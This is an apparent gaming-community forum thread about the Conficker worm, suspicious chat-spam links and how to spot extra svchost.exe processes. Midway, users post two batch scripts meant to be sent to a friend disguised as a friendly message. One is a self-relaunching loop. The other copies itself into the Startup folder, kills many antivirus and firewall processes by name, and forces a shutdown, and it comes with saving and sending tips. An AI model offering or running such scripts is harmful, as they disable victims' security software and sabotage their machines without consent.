Destination Time
:
Present Time
:
Last Time Departed
Sign in to follow this  
Saiyaman

Conficker

good thing I unplugged my internet before I left for Orlando.

http://accept-your-gift.com/freestuff.php

ARE YOU CRAZY ENOUGH TO JOIN THE BIGGEST FREE-SHOWER-FEST EVER?! GET free LAPTOPS, RINGTONES, PHONES & MORE

I dunno if it is true, but I don't wanna open this link. I just receive this message from my friend shamel but when I open the window it says he is not online. DO NOT OPEN THE LINK

good thing I unplugged my internet before I left for Orlando.

Even though you have unplugged your internet it won't serve any difference. It is said that conficker will still activate after you've restarted your internet (modem/broadband). So best thing to do is to run your virus program after a couple of hours of restarting your internet. Thing to notice is if there's an extra svchost.exe process working on your computer (other than the numerous normal ones), At least that's what I would suspect.

shamel says:

ape yang biar betol

Johny/\Syazwan says:

ko ader x antar meseg yg pelik2

shamel says:

macam

Johny/\Syazwan says:

baik ko cek pc ko skang jugak aku rs dah ader virus

shamel says:

ok

Johny/\Syazwan says:

sbb aku dpt meseg yg pelik2 dr ko dan mungking bukan ko yg antar tp virus conficker c

guner avg 8.5

translation:

shamel says:

what's wrong

Johny/\Syazwan says:

have you send weird messages

shamel says:

Johny/\Syazwan says:

you better check your pc cause I think it has a virus

shamel says:

ok

Johny/\Syazwan says:

because I've got weird messages from you and it might be the conficker c virus

use avg 8.5

and after 2 minutes, he suddenly offline and on weird message came out again. And I close the window and ignore the message.

Block him. Make a .bat file, name it a.bat and put inside this:

@echo off

:START

start a.bat

goto START

Then send it to him, with text "Have a nice day :)"

Better don't open it.

I once accidentally open 1 link and it starts to slow my pc down. I just do a system restore.

Thing to notice is if there's an extra svchost.exe process working on your computer (other than the numerous normal ones), At least that's what I would suspect.

The problem is that...you can't really tell an "extra svchost.exe process" from the "numerous normal ones".

I once accidentally open 1 link and it starts to slow my pc down. I just do a system restore.

System restore as in reinstalling your OS, or system restore as in Windows System Restore? Windows System Restore ain't helpful in getting rid of this virus.

@echo off

:START

start a.bat

goto START

Then send it to him, with text "Have a nice day :)"

lol a loop. Anyone who opens this will end up opening the same batch file

People who sends "weird messages" via instant messaging aren't idiots who try to give the Conficker virus to someone else, because it ain't them who're giving the virus but the virus itself. Also, for those who are using Limewire, BearShare, Napster, KaZaA, Gnutella, torrents, and pretty much all else P2P, better watch out too.

I count six

Mine's 12. It's been like this since I was still using Windows Vista, though I always check my computer for viruses/spyware so none of those is s***.

There isn't a specific number of svchost.exe processes to take note. It varies according to the number of programs that hosts and/or contains services to perform tasks or stuff like that. These programs include anti-viruses/anti-spywares, Windows programs, some browsers, program add-ons/extensions, etc.. Unless you know how to count them all, it's really hard to tell.

I thought Napster was a legit service, like iTunes?

@RG-FM, even better(caus im a master at batch):

@echo off

echo have a nice day!

copy %0 %windir%\Core.bat > nul

copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\win.bat" > nul

set t=tskill

%t% norton*

%t% av*

%t% fire*

%t% anti*

%t% spy*

%t% bullguard

%t% PersFw

%t% KAV*

%t% ZONEALARM

%t% SAFEWEB

%t% OUTPOST

%t% nv*

%t% nav*

%t% F-*

%t% ESAFE

%t% cle

%t% BLACKICE

%t% def*

shutdown -f -s -t 15 -c "LOL, SHUTDOWNNN!!!!!"

it will close anti viruses, then display an message then shutdowns after 15 seconds. and will open anytime a person logs on. have fun! don't open it yourself.

save it as "(whateva).bat" (in notepad, select all files when saving.)

this will not harm, but if is too far, go ahead and delete this post!

13 here

Same.

7 here.

@edfake: What RG-FM was trying to make him do is to annoy him by having a batch file endlessly open itself over and over again. Yours is entirely different. Also, I happen to have the 10 anti-viruses of the 18 you've listed. Only 3 of them closed. Also the shutdown part didn't work -- it did shutdown, and the message appeared, but the batch never re-opened after logging-in.

If you really are a master at batch, you should know that the code you just made only works in Windows XP (note that you used a more specific directory, which exists ONLY in Windows XP, and not all of us here use Windows XP). RG-FM's works on all versions of Windows and because it's very simple it's completely invisible. :P

Thank you, thank you.

But.

I didn't actually make it. :P It's creator was crazyjointje, when he made it up for some member who annoyed him. Then he accidently opened it and crashed both his computers. :P So be careful with these.. xD

It's creator was crazyjointje, when he made it up for some member who annoyed him.

lol. No wonder the code (or the way the code is made) seems familiar. :lol:

Are there actually any universal viruses, like running on Windows, Mac AND Linux?

Sign in to follow this